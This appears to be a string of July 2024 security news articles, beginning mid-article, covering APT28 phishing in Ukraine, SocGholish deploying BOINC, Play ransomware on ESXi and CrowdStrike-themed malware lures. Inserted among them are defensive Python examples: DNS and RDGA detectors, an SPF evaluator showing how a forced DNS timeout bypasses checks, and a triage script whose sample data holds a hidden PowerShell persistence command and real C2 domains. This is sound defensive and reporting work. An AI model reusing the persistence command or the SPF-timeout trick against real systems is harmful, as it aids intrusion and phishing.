Earlier this May, the Turkish competition board imposed a $37.20 million penalty against the American tech giant over its data-sharing practices across Facebook, Instagram, Threads, and WhatsApp.
It also follows a report that Oracle has agreed to pay $115 million to settle a class-action lawsuit in the U.S. accusing the database software and cloud computing company of breaching users' privacy by collecting their personal information and selling it to third-parties.
Google, meanwhile, has become the subject of a new probe initiated by the Italian data protection authority over how it gets users' consent prior to combining personal data from different services and if it provides adequate information to influence that choice.
"Google may use techniques and methods for requesting consent, and also for setting up the mechanisms for obtaining consent itself, which could condition the freedom of choice of the average consumer," the Garante alleged.
"Indeed, the customer would be induced to take a commercial decision that he/she would not have taken otherwise, by consenting to the combination and cross-use of his/her personal data among the plurality of services offered."
Ukrainian Institutions Targeted Using HATVIBE and CHERRYSPY Malware
24.7.24
BigBrothers The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a spear-phishing campaign targeting a scientific research institution in the country with malware known as HATVIBE and CHERRYSPY.
The agency attributed the attack to a threat actor it tracks under the name UAC-0063, which was previously observed targeting various government entities to gather sensitive information using keyloggers and backdoors.
The attack is characterized by the use of a compromised email account belonging to an employee of the organization to send phishing messages to "dozens" of recipients containing a macro-laced Microsoft Word (DOCX) attachment.
Opening the document and enabling macros results in the execution of an encoded HTML Application (HTA) named HATVIBE, which sets up persistence on the host using a scheduled task and paves the way for a Python backdoor codenamed CHERRYSPY, which is capable of running commands issued by a remote server.
CERT-UA said it detected "numerous cases" of HATVIBE infections that exploit a known security flaw in HTTP File Server (CVE-2024-23692, CVSS score: 9.8) for initial access.
UAC-0063 has been associated with a Russia-linked nation-state group dubbed APT28 with moderate confidence. APT28, which is also referred to as BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is affiliated with Russia's strategic military intelligence unit, the GRU.
The development comes as CERT-UA detailed another phishing campaign targeting Ukrainian defense enterprises with booby-trapped PDF files embedding a link that, when clicked, downloads an executable (aka GLUEEGG), which is responsible for decrypting and running a Lua-based loader called DROPCLUE.
DROPCLUE is designed to open a decoy document to the victim, while covertly downloading a legitimate Remote Desktop program called Atera Agent using the curl utility. The attack has been linked to a cluster tracked as UAC-0180.
Google Abandons Plan to Phase Out Third-Party Cookies in Chrome
23.7.24
Security The Hacker News
Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger, controversial proposal called the Privacy Sandbox.
"Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they'd be able to adjust that choice at any time," Anthony Chavez, vice president of the initiative, said.
"We're discussing this new path with regulators, and will engage with the industry as we roll this out."
The significant policy reversal comes nearly three months following the company's announcement that it intends to eliminate third-party cookies starting early next year after repeated delays, underscoring the project's tumultuous history.
While Apple Safari and Mozilla Firefox no longer support third-party cookies as of early 2020, Google has had a tougher time turning it off owing to its own prominent role as a web browser vendor and an advertising platform.
The company's idea of balancing online privacy vis-à-vis an ad-supported internet using Privacy Sandbox has courted scrutiny from regulators, advertisers, and privacy advocates, prompting it to redraw the contours of the cookie-replacement technology several times over the past few years.
Last month, Austrian privacy non-profit noyb (none of your business) said it merely shifts the control from a third-party to Google and that it can still be used to track users without giving them an option to consent in an informed and transparent manner.
Apple, which has introduced advanced tracking and fingerprinting protections in Safari, has been critical of Topics API, a crucial aspect of Privacy Sandbox that sorts users' interests into an ever-evolving list of predefined topics based on their browsing histories in order to serve personalized ads.
"The user doesn't get told upfront which topics Chrome has tagged them with or which topics it exposes to which parties," Apple's John Wilander said, noting how it can be used to fingerprint and re-identify users as well as profile their cross-site activity.
Specifically, it pointed out implementation loopholes that could potentially allow a data broker embedded in websites to capture a user's changing interests over time by periodically querying the Topics API and creating a permanent profile by combining it with other data points.
"Now imagine what advanced machine learning and artificial intelligence can deduce about you based on various combinations of interest signals," Wilander said. "What patterns will emerge when data brokers and trackers can compare and contrast across large portions of the population?"
"We think the web should not expose such information across websites and we don't think the browser, i.e. the user agent, should facilitate any such data collection or use."
Privacy Sandbox has also faced regulatory hurdles over concerns that the technology could give Google an unfair advantage in the digital advertising market and limit competition, complicating the rollout process further.
The development is an admission from Google that gaining industry-wide consensus around a single solution is more challenging than it sounds. A pivot from cookies "requires significant work by many participants and will have an impact on publishers, advertisers, and everyone involved in online advertising," it said.
The U.K. Competition and Markets Authority (CMA), which is closely overseeing the changes being made by the search giant, said it's evaluating the impact of the new announcement.
"Instead of removing third-party cookies from Chrome, it will be introducing a user-choice prompt, which will allow users to choose whether to retain third-party cookies," the CMA said. "The CMA will now work closely with the [Information Commissioner's Office] to carefully consider Google's new approach to Privacy Sandbox."
Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking
23.7.24
Hacking The Hacker News
The relationship between various TDSs and DNS associated with Vigorish Viper and
the final landing experience for the user
A Chinese organized crime syndicate with links to money laundering and human
trafficking across Southeast Asia has been using an advanced "technology suite"
that runs the whole cybercrime supply chain spectrum to spearhead its operations.
Infoblox is tracking the proprietor and maintainer under the moniker Vigorish Viper, noting that it's developed by the Yabo Group (aka Yabo Sports), which has been linked to illegal gambling operations and pig butchering scams in the past. In late 2022, it rebranded as Kaiyun Sports and has since been absorbed into another newly formed entity called Ponymuah.
The suite, marketed in China as "baowang" ("包网," meaning full package) encompasses several components such as Domain Name System (DNS) configurations, website hosting, payment mechanisms, advertising, and mobile apps. It also hosts thousands of domain names and numerous brands in an infrastructure that's tied to Hong Kong and China.
The enterprise hinges on securing European football club sponsorships using front companies or white label brands, and using them as a "force multiplier" to advertise illegal gambling sites in the region with the goal of attracting more bettors. In July 2023, it was reported that betting company logos appeared as often as 3,500 times during the course of a televised football match.
Yabo, Ponymuah, and other related offshoots like OB (aka OBGM), DB Gaming, Panda Sports, KM Gaming, and Smart King Games (SKG) are all part of Vigorish Viper's sprawling network, highlighting the tangled and murky ownership of the gambling companies and the painstaking steps undertaken to sidestep scrutiny.
It's not just English football clubs that have engaged in these sponsorships, as the investigation has unearthed that cricket and kabaddi teams in India have also entered into similar sponsorship agreements to advertise Vigorish Viper brands.
"Vigorish Viper operates a vast network of over 170,000 active domain names, evading detection and law enforcement through its sophisticated use of DNS CNAME traffic distribution systems," Infoblox researchers Maël Le Touz, Jacques Portal, Renée Burton, and Elena Puga said in an exhaustive report shared with The Hacker News.
"In addition to gambling, Vigorish Viper's CNAME [traffic distribution systems] serve illegal streaming and pornography sites. Some of the domains used for streaming are long-registered domains that Vigorish Viper picked up after the original registration expired."
Burton, vice president of threat intelligence at Infoblox, described the threat actor as "one of the most sophisticated and important threats to digital security" discovered to date.
An overview of Vigorish Viper's sports sponsorship scheme
"Vigorish Viper created a complex infrastructure with multiple layers of traffic
distribution systems (TDSs) using DNS CNAME records and JavaScript, which makes
it incredibly difficult to detect," Burton said in a statement. "These systems
are complemented by their own encrypted communications and custom-developed
applications, making their activities not only elusive but also remarkably
resilient."
This entails the use of DNS CNAME records to redirect traffic from one domain through another, a technique previously adopted by other DNS threat actors like Savvy Seahorse. Furthermore, the system has the capability to differentiate between residential, mobile, and commercial IP addresses in China.
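The CNAME-based TDS described above is visible in passive DNS: many disposable front domains alias, through one or more intermediate names, to the same small set of canonical targets. The following is an added example (not Infoblox's code) that follows CNAME chains over a constructed zone snapshot and clusters front domains by the canonical name they terminate at, which is the pivot an analyst would use to enumerate a TDS. All domain names and addresses in it are hypothetical placeholders, not Vigorish Viper indicators; the hop limit and loop handling mirror what a real resolver does when chasing CNAMEs.

```python
"""Follow DNS CNAME chains and cluster domains by their final canonical target.

Added illustration of how a CNAME-based traffic distribution system (TDS) can be
surfaced from passive DNS data. The zone table is constructed for the example and
its names are hypothetical placeholders, not real indicators.
"""
from collections import defaultdict

# Constructed passive-DNS snapshot: owner name -> (record type, target)
ZONE = {
    "brand-a.example": ("CNAME", "edge.tds-layer1.example"),
    "brand-b.example": ("CNAME", "edge.tds-layer1.example"),
    "stream-c.example": ("CNAME", "node7.tds-layer2.example"),
    "edge.tds-layer1.example": ("CNAME", "node7.tds-layer2.example"),
    "node7.tds-layer2.example": ("A", "203.0.113.10"),
    "unrelated.example": ("A", "198.51.100.5"),
    "loop-a.example": ("CNAME", "loop-b.example"),
    "loop-b.example": ("CNAME", "loop-a.example"),
}

MAX_HOPS = 8  # resolvers cap CNAME chasing; a loop or over-long chain is itself a signal


def follow_cname(name, zone=ZONE, max_hops=MAX_HOPS):
    """Return (chain, terminal): chain lists every name visited, terminal is the
    final non-CNAME owner, or None if the chain dangles, loops or is too long."""
    chain = [name]
    seen = {name}
    current = name
    for _ in range(max_hops):
        rec = zone.get(current)
        if rec is None:
            return chain, None          # dangling CNAME / NXDOMAIN
        rtype, target = rec
        if rtype != "CNAME":
            return chain, current        # terminal A/AAAA owner
        if target in seen:
            return chain, None          # CNAME loop
        seen.add(target)
        chain.append(target)
        current = target
    return chain, None                  # chain exceeded max_hops


def cluster_by_terminal(names, zone=ZONE):
    """Group front domains by the canonical name their CNAME chain ends at.
    Domains sharing a terminal share infrastructure; broken chains go under None."""
    clusters = defaultdict(list)
    for n in sorted(names):
        _, terminal = follow_cname(n, zone)
        clusters[terminal].append(n)
    return dict(clusters)


def shared_terminals(names, zone=ZONE, min_size=2):
    """Terminals reached by at least min_size distinct front domains: the
    candidate TDS aggregation points worth pivoting on."""
    return {t: ds for t, ds in cluster_by_terminal(names, zone).items()
            if t is not None and len(ds) >= min_size}


if __name__ == "__main__":
    fronts = [n for n, (rt, _) in ZONE.items() if rt == "CNAME"]
    for terminal, members in cluster_by_terminal(fronts).items():
        print(terminal, "<-", members)
```

Against real passive-DNS data the same clustering step is what turns one anomalous domain into a view of the whole TDS: every front domain whose chain ends at the same layer-2 node is, by construction, served by the same operator.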
Earlier this January, the Danish Institute for Sports Studies' Play the Game initiative uncovered connections between dozens of European football clubs and illegal gambling brands that can be traced back to Yabo and target jurisdictions like China where gambling is prohibited and considered an organized crime.
The online crimes also have an offline aspect involving human trafficking wherein people are lured with the promise of high-paying jobs and are coerced into supporting sports betting schemes and promoting pig butchering scams and other cryptocurrency scams, according to the Asian Racing Federation (ARF).
"Operating in teams of 8-10, some coordinate with commentators and broadcasters of live sport (presumably on pirate streams) to promote live chat groups marketing betting websites during games," according to a report [PDF] released by the ARF in October 2023. "Others act as relationship managers to encourage customers to continue betting and others as direct customer recruitment agents."
Steps between when a user visits a site and starts placing bets
Infoblox said its own investigation into Vigorish Viper stemmed from a single
anomalous domain, kb[.]com – a gambling site named KB Sports that uses Chinese
nameservers – which also hosts yabo[.]com, the domain name for Yabo Sports.
An interesting aspect to note here is that the website is geo-blocked to users located in France and elsewhere in Europe, but is accessible from mainland China and the special administrative regions of Hong Kong and Macau.
"When visited from one of those areas, the user is redirected to another domain — for example, kb830[.]com," the researchers pointed out. "The redirection domain changes over time. Additionally, all 'right click' functionality is disabled on the site, as is text selection, hindering efforts to investigate or copy the site."
Visitors to the website are then served ads promoting financial incentives for betting regularly, alongside options to pay using WeChat Pay, EBpay, Alipay, JD Pay, KOIPay, AstroPay, YunShanFu, UniPay, Net Pay, Fast Pay, and NetBank. The betting takes place through agents, who place the bets, manage the deposits, and communicate with gamblers through bespoke, encrypted chat apps.
A deeper examination of the DNS query logs has also unearthed evidence that Vigorish Viper's activities transcend China to target users across the world.
The sites embed other defenses as well: they periodically check for signs of automated activity and serve a CAPTCHA puzzle, both to frustrate scanning and before a visitor can reach customer support, a function staffed by real people who have been trafficked into Southeast Asia.
That's not all. Users visiting one of Vigorish Viper's brand domains are subjected to multiple rounds of fingerprinting checks to validate that the IP address is in China and they are legitimate, before they are allowed to bet on the sites.
"Both the DNS and the software tie Vigorish Viper's entire enterprise to Yabo Sports or Yabo Group," the company said. "Their reach extends to dozens of brands, possibly hundreds, and targets users beyond Southeast Asia."
"In spite of the massive number of domain names, websites, and accompanying applications, along with overt presence in the public eye, Vigorish Viper is operating directly and inexplicably in the PRC without meaningful consequence."
PINEAPPLE and FLUXROOT Hacker Groups Abuse Google Cloud for Credential Phishing
23.7.24
Virus The Hacker News
A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has
been observed leveraging Google Cloud serverless projects to orchestrate
credential phishing activity, highlighting the abuse of the cloud computing
model for malicious purposes.
"Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use," Google said in its biannual Threat Horizons Report [PDF] shared with The Hacker News.
"These same features make serverless computing services for all cloud providers attractive to threat actors, who use them to deliver and communicate with their malware, host and direct users to phishing pages, and to run malware and execute malicious scripts specifically tailored to run in a serverless environment."
The campaign involved the use of Google Cloud container URLs to host credential phishing pages with the aim of harvesting login information associated with Mercado Pago, an online payments platform popular in the LATAM region.
FLUXROOT, per Google, is the threat actor known for distributing the Grandoreiro banking trojan, with recent campaigns also taking advantage of legitimate cloud services like Microsoft Azure and Dropbox to distribute the malware.
Separately, Google's cloud infrastructure has also been weaponized by another adversary named PINEAPPLE to propagate another stealer malware known as Astaroth (aka Guildma) as part of attacks targeting Brazilian users.
"PINEAPPLE used compromised Google Cloud instances and Google Cloud projects they created themselves to create container URLs on legitimate Google Cloud serverless domains such as cloudfunctions[.]net and run.app," Google noted. "The URLs hosted landing pages redirecting targets to malicious infrastructure that dropped Astaroth."
Furthermore, the threat actor is said to have attempted to bypass email gateway protections by making use of mail forwarding services that do not drop messages with failed Sender Policy Framework (SPF) records, or incorporating unexpected data in the SMTP Return-Path field in order to trigger a DNS request timeout and cause email authentication checks to fail.
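The second trick above relies on a subtlety of how SPF results are consumed: a DNS timeout while looking up the Return-Path domain yields a "temperror", not a "fail", and a gateway that only rejects on explicit failures will deliver the message. The following is an added example (not Google's code and not a complete SPF implementation) that evaluates a minimal subset of SPF (ip4 mechanisms plus the "all" qualifier, per RFC 7208) over a simulated resolver, so the effect of a forced timeout on the gateway's decision can be seen end to end. The domains, addresses and the resolver's timeout behaviour are constructed for illustration.

```python
"""Minimal SPF evaluation over a simulated resolver, showing why a sender that
can force a DNS timeout on its Return-Path domain gets 'temperror' rather than
'fail', and why a gateway that rejects only on 'fail' then lets the mail through.
Added example; domains, addresses and resolver behaviour are constructed.
"""
import ipaddress
from email.utils import parseaddr


class DnsTimeout(Exception):
    pass


# Constructed TXT table. A Return-Path domain listed in TIMEOUT_DOMAINS simulates
# a name whose authoritative servers never answer within the gateway's deadline.
TXT = {
    "bank.example": "v=spf1 ip4:192.0.2.0/24 -all",
    "shop.example": "v=spf1 ip4:198.51.100.10 ~all",
}
TIMEOUT_DOMAINS = {"a" * 60 + ".slow.example"}

QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_txt(domain):
    if domain in TIMEOUT_DOMAINS:
        raise DnsTimeout(domain)
    return TXT.get(domain)


def return_path_domain(return_path):
    """Domain of the SMTP envelope sender (the Return-Path), lower-cased."""
    _, addr = parseaddr(return_path)
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].strip("<>").lower()


def spf_check(return_path, client_ip, resolver=lookup_txt):
    """Return pass / fail / softfail / neutral / none / permerror / temperror.
    Only ip4: mechanisms and 'all' are supported; enough for the example."""
    domain = return_path_domain(return_path)
    if domain is None:
        return "none"
    try:
        record = resolver(domain)
    except DnsTimeout:
        return "temperror"              # RFC 7208: transient DNS failure
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:"):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return QUALIFIER_RESULT[qualifier]
        elif term == "all":
            return QUALIFIER_RESULT[qualifier]
        else:
            return "permerror"          # mechanism not handled by this toy evaluator
    return "neutral"


def gateway_decision(spf_result, reject_on=frozenset({"fail"})):
    """Weak default: only an explicit 'fail' is rejected, so 'temperror' is
    delivered. A stricter gateway adds 'temperror' and 'permerror' to reject_on,
    or defers with a 4xx on temperror so the check is retried once DNS answers."""
    return "reject" if spf_result in reject_on else "deliver"
```

The check to make on a real gateway is the same one `gateway_decision` encodes: confirm what the policy does with "temperror" (and with messages forwarded by a service that does not enforce SPF at all), because DMARC alignment and the downstream reject rule are only as strong as that branch.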
The search giant said it took steps to mitigate the activities by taking down the malicious Google Cloud projects and updating its Safe Browsing lists.
The weaponization of cloud services and infrastructure by threat actors – ranging from illicit cryptocurrency mining as a consequence of weak configurations to ransomware – has been fueled by the enhanced adoption of cloud across industries.
Furthermore, the approach has the added benefit of allowing adversaries to blend into normal network activities, making detection a lot more challenging.
"Threat actors take advantage of the flexibility and ease of deployment of serverless platforms to distribute malware and host phishing pages," the company said. "Threat actors abusing cloud services shift their tactics in response to defenders' detection and mitigation measures."
SocGholish Malware Exploits BOINC Project for Covert Cyberattacks
23.7.24
Virus The Hacker News
The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being
used to deliver a remote access trojan called AsyncRAT as well as a legitimate
open-source project called BOINC.
BOINC, short for Berkeley Open Infrastructure for Network Computing, is an open-source "volunteer computing" platform maintained by the University of California with the aim of carrying out "large-scale distributed high-throughput computing" using participating home computers on which the app is installed.
"It's similar to a cryptocurrency miner in that way (using computer resources to do work), and it's actually designed to reward users with a specific type of cryptocurrency called Gridcoin, designed for this purpose," Huntress researchers Matt Anderson, Alden Schmidt, and Greg Linares said in a report published last week.
These malicious installations are designed to connect to an actor-controlled domain ("rosettahome[.]cn" or "rosettahome[.]top"), essentially acting as a command-and-control (C2) server to collect host data, transmit payloads, and push further commands. As of July 15, 10,032 clients are connected to the two domains.
The cybersecurity firm said while it hasn't observed any follow-on activity or tasks being executed by the infected hosts, it hypothesized that the "host connections could be sold off as initial access vectors to be used by other actors and potentially used to execute ransomware."
SocGholish attack sequences typically begin when users land on compromised websites, where they are prompted to download a fake browser update that, upon execution, triggers the retrieval of additional payloads to the infiltrated machines.
The JavaScript downloader, in this case, activates two separate chains, one leading to the deployment of a fileless variant of AsyncRAT and the other resulting in the BOINC installation.
The BOINC app, which is renamed as "SecurityHealthService.exe" or "trustedinstaller.exe"
to evade detection, sets up persistence using a scheduled task by means of a
PowerShell script.
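The observables above (a BOINC client renamed after a Windows system binary, persisted with a PowerShell-created scheduled task, and beaconing to rosettahome[.]cn or rosettahome[.]top) map onto three triage rules. The following is an added example (not Huntress's detection logic) that runs them over constructed Sysmon-style events. The two C2 domains and the two impersonated file names are taken from the report as described here; the expected on-disk locations of the genuine binaries and the shape of the PowerShell command line are assumptions made for the example.

```python
"""Triage rules for the SocGholish/BOINC tradecraft, run over constructed
Sysmon-style events. Added example, not Huntress's detection logic.
Indicators from the report: the two C2 domains and the two impersonated file
names. Assumed for the example: the legitimate paths of those binaries and the
form of the PowerShell command that registers the scheduled task.
"""
import ntpath

C2_DOMAINS = ("rosettahome.cn", "rosettahome.top")

# Assumed legitimate locations of the impersonated binaries (lower-cased).
EXPECTED_PATHS = {
    "securityhealthservice.exe": r"c:\windows\system32\securityhealthservice.exe",
    "trustedinstaller.exe": r"c:\windows\servicing\trustedinstaller.exe",
}

# Constructed events; field names loosely follow Sysmon EID 1 / EID 22-style output.
SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\SecurityHealthService.exe",
     "cmdline": "SecurityHealthService.exe"},
    {"event": "process_create",
     "image": r"C:\Users\alice\AppData\Roaming\SecurityHealthService.exe",
     "cmdline": "SecurityHealthService.exe"},
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden Register-ScheduledTask -TaskName Update '
                r'-Action (New-ScheduledTaskAction -Execute '
                r'"C:\Users\alice\AppData\Roaming\SecurityHealthService.exe")'},
    {"event": "network_connect",
     "image": r"C:\Users\alice\AppData\Roaming\SecurityHealthService.exe",
     "dest_host": "rosettahome.top", "dest_port": 443},
    {"event": "network_connect",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "boinc.berkeley.edu", "dest_port": 443},
]


def masquerading_binary(ev):
    """A file named like a protected system binary running from the wrong path."""
    name = ntpath.basename(ev["image"]).lower()
    expected = EXPECTED_PATHS.get(name)
    return expected is not None and ev["image"].lower() != expected


def c2_beacon(ev):
    """Destination is one of the actor-controlled BOINC 'project' domains."""
    host = ev["dest_host"].lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def scheduled_task_for_masquerade(ev):
    """PowerShell registering a scheduled task whose command line names one of
    the impersonated binaries (command-line shape assumed for the example)."""
    image = ntpath.basename(ev["image"]).lower()
    cmd = ev["cmdline"].lower()
    return (image in ("powershell.exe", "pwsh.exe")
            and ("register-scheduledtask" in cmd or "schtasks" in cmd)
            and any(n in cmd for n in EXPECTED_PATHS))


def triage(events):
    """Return (rule, image) findings in arrival order."""
    findings = []
    for ev in events:
        if ev["event"] == "process_create":
            if masquerading_binary(ev):
                findings.append(("masquerading_binary", ev["image"]))
            if scheduled_task_for_masquerade(ev):
                findings.append(("scheduled_task_for_masquerade", ev["image"]))
        elif ev["event"] == "network_connect" and c2_beacon(ev):
            findings.append(("boinc_c2_beacon", ev["image"]))
    return findings


if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The path check is the durable rule of the three: C2 domains rotate and command lines vary, but a process whose image name belongs to a Windows system binary yet lives under a user profile is wrong regardless of which payload was renamed.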
The misuse of BOINC for malicious purposes hasn't gone unnoticed by the project maintainers, who are currently investigating the problem and finding a way to "defeat this malware." Evidence of the abuse dates back to at least June 26, 2024.
"The motivation and intent of the threat actor by loading this software onto infected hosts isn't clear at this point," the researchers said.
"Infected clients actively connecting to malicious BOINC servers present a fairly high risk, as there's potential for a motivated threat actor to misuse this connection and execute any number of malicious commands or software on the host to further escalate privileges or move laterally through a network and compromise an entire domain."
The development comes as Check Point said it's been tracking the use of compiled V8 JavaScript by malware authors to sidestep static detections and conceal remote access trojans, stealers, loaders, cryptocurrency miners, wipers, and ransomware.
"In the ongoing battle between security experts and threat actors, malware developers keep coming up with new tricks to hide their attacks," security researcher Moshe Marelus said. "It's not surprising that they've started using V8, as this technology is commonly used to create software as it is very widespread and extremely hard to analyze."
New Linux Variant of Play Ransomware Targeting VMware ESXi Systems
23.7.24
Ransom The Hacker News
Cybersecurity researchers have discovered a new Linux variant of a ransomware
strain known as Play (aka Balloonfly and PlayCrypt) that's designed to target
VMware ESXi environments.
"This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations," Trend Micro researchers said in a report published Friday.
Play, which arrived on the scene in June 2022, is known for its double extortion tactics, encrypting systems after exfiltrating sensitive data and demanding payment in exchange for a decryption key. According to estimates released by Australia and the U.S., as many as 300 organizations have been victimized by the ransomware group as of October 2023.
Statistics shared by Trend Micro for the first seven months of 2024 show that the U.S. is the country with the highest number of victims, followed by Canada, Germany, the U.K., and the Netherlands.
Manufacturing, professional services, construction, IT, retail, financial services, transportation, media, legal services, and real estate are some of the top industries affected by the Play ransomware during the time period.
The cybersecurity firm's analysis of a Linux variant of Play comes from a RAR archive file hosted on an IP address (108.61.142[.]190), which also contains other tools identified as utilized in previous attacks such as PsExec, NetScan, WinSCP, WinRAR, and the Coroxy backdoor.
"Though no actual infection has been observed, the command-and-control (C&C) server hosts the common tools that Play ransomware currently uses in its attacks," it said. "This could denote that the Linux variant might employ similar tactics, techniques, and procedures (TTPs)."
The ransomware sample, upon execution, ensures that it's running in an ESXi environment before proceeding to encrypt virtual machine (VM) files, including VM disk, configuration, and metadata files, and appending them with the extension ".PLAY." A ransom note is then dropped in the root directory.
Further analysis has determined that the Play ransomware group is likely using the services and infrastructure peddled by Prolific Puma, which offers an illicit link-shortening service to other cybercriminals to help them evade detection while distributing malware.
Specifically, it employs what's called a registered domain generation algorithm
(RDGA) to spin up new domain names, a programmatic mechanism that's increasingly
being used by several threat actors, including VexTrio Viper and Revolver Rabbit,
for phishing, spam, and malware propagation.
Revolver Rabbit, for instance, is believed to have registered over 500,000 domains on the ".bond" top-level domain (TLD) at an approximate cost of more than $1 million, leveraging them as active and decoy C2 servers for the XLoader (aka FormBook) stealer malware.
"The most common RDGA pattern this actor uses is a series of one or more dictionary words followed by a five-digit number, with each word or number separated by a dash," Infoblox noted in a recent analysis. "Sometimes the actor uses ISO 3166-1 country codes, full country names, or numbers corresponding to years instead of dictionary words."
RDGAs are a lot more challenging to detect and defend against than traditional DGAs owing to the fact that they allow threat actors to generate many domain names to register them for use – either all at once or over time – in their criminal infrastructure.
"In an RDGA, the algorithm is a secret kept by the threat actor, and they register all the domain names," Infoblox said. "In a traditional DGA, the malware contains an algorithm that can be discovered, and most of the domain names will not be registered. While DGAs are used exclusively for connection to a malware controller, RDGAs are used for a wide range of malicious activity."
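Because the RDGA algorithm itself is never shipped in the malware, defenders cannot recover it from a sample; what remains is the structural pattern Infoblox describes (dash-separated dictionary words, country codes or years, then a five-digit number) across the registered names. The following is an added example (not Infoblox's detector) of a structural matcher for that shape run over constructed DNS query-log lines; the .bond domains in the sample log are hypothetical, not real Revolver Rabbit indicators, and the watched-TLD list is an assumption for the example.

```python
"""Structural detector for the registered-DGA (RDGA) naming pattern attributed
to Revolver Rabbit: one or more dash-separated dictionary words (or ISO 3166-1
country codes, country names, or years) followed by a five-digit number.
Added example, not Infoblox's detector. The log lines are constructed and the
.bond domains in them are hypothetical, not real indicators.
"""
import re
from collections import Counter

# label := token(-token)*-NNNNN, token := letters only (word / country code /
# country name) or a four-digit year
RDGA_LABEL = re.compile(
    r"^(?P<words>(?:[a-z]+|(?:19|20)\d{2})(?:-(?:[a-z]+|(?:19|20)\d{2}))*)"
    r"-(?P<num>\d{5})$"
)


def is_rdga_candidate(fqdn, watched_tlds=("bond",)):
    """True if the registrable label of fqdn matches the word(-word)*-NNNNN shape
    under a watched TLD. The registrable label is taken as the label immediately
    left of the TLD; deeper subdomains are ignored."""
    parts = fqdn.lower().rstrip(".").split(".")
    if len(parts) < 2 or parts[-1] not in watched_tlds:
        return False
    return RDGA_LABEL.match(parts[-2]) is not None


# Constructed DNS query log: "<timestamp> <client> <qname> <qtype>"
SAMPLE_LOG = """\
2024-07-20T10:01:02Z 10.0.0.15 silver-ocean-48213.bond A
2024-07-20T10:01:05Z 10.0.0.15 www.example.bond A
2024-07-20T10:02:17Z 10.0.0.22 de-2019-00731.bond A
2024-07-20T10:02:40Z 10.0.0.22 update.microsoft.com A
2024-07-20T10:03:01Z 10.0.0.31 cdn.blue-river-90001.bond A
2024-07-20T10:03:09Z 10.0.0.31 blue-river-9001.bond A
2024-07-20T10:04:00Z 10.0.0.15 quiet-forest-11111.bond A
"""


def scan_log(text):
    """Return (hits, per_client): hits is the list of (client, qname) matching the
    RDGA shape; per_client counts hits per source, to find the infected host."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _, client, qname, _ = fields[:4]
        if is_rdga_candidate(qname):
            hits.append((client, qname))
    return hits, Counter(c for c, _ in hits)


if __name__ == "__main__":
    hits, per_client = scan_log(SAMPLE_LOG)
    for client, qname in hits:
        print(client, qname)
    print(per_client.most_common())
```

The shape alone will also match benign names, so in practice the match is a hunting lead to enrich with registration date and registrar rather than a blocking rule: what distinguishes an RDGA is hundreds of such names registered in bulk through the same channel, not any single one.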
The latest findings indicate a potential collaboration between two cybercriminal entities, suggesting that the Play ransomware actors are taking steps to bypass security protocols through Prolific Puma's services.
"ESXi environments are high-value targets for ransomware attacks due to their critical role in business operations," Trend Micro concluded. "The efficiency of encrypting numerous VMs simultaneously and the valuable data they hold further elevate their lucrativeness for cybercriminals."
Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT Malware
21.7.24
Virus The Hacker News
Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide
IT disruptions by pushing out a flawed update to Windows devices, is now warning
that threat actors are exploiting the situation to distribute Remcos RAT to its
customers in Latin America under the guise of providing a hotfix.
The attack chains involve distributing a ZIP archive file named "crowdstrike-hotfix.zip," which contains a malware loader named Hijack Loader (aka DOILoader or IDAT Loader) that, in turn, launches the Remcos RAT payload.
Specifically, the archive file also includes a text file ("instrucciones.txt") with Spanish-language instructions that urges targets to run an executable file ("setup.exe") to recover from the issue.
"Notably, Spanish filenames and instructions within the ZIP archive indicate this campaign is likely targeting Latin America-based (LATAM) CrowdStrike customers," the company said, attributing the campaign to a suspected e-crime group.
On Friday, CrowdStrike acknowledged that a routine sensor configuration update pushed to its Falcon platform for Windows devices on July 19 at 04:09 UTC inadvertently triggered a logic error that resulted in a Blue Screen of Death (BSoD), rendering numerous systems inoperable and sending businesses into a tailspin.
The event impacted customers running Falcon sensor for Windows version 7.11 and above that were online between 04:09 and 05:27 UTC.
Malicious actors have wasted no time capitalizing on the chaos created by the event to set up typosquatting domains impersonating CrowdStrike and advertise services to companies affected by the issue in return for a cryptocurrency payment.
Customers who are impacted are recommended to "ensure they are communicating with CrowdStrike representatives through official channels and adhere to technical guidance the CrowdStrike support teams have provided."
17-Year-Old Linked to Scattered Spider Cybercrime Syndicate Arrested in U.K.
21.7.24
Crime The Hacker News
Law enforcement officials in the U.K. have arrested a 17-year-old boy from
Walsall who is suspected to be a member of the notorious Scattered Spider
cybercrime syndicate.
The arrest was made "in connection with a global cyber online crime group which has been targeting large organizations with ransomware and gaining access to computer networks," West Midlands police said. "The arrest is part of a global investigation into a large-scale cyber hacking community which has targeted a number of major companies which includes MGM Resorts in America."
The teen's arrest, carried out in coordination with the U.K. National Crime Agency (NCA) and the U.S. Federal Bureau of Investigation (FBI), comes a little over a month after another 22-year-old member of the e-crime syndicate from the U.K. was apprehended in Spain.
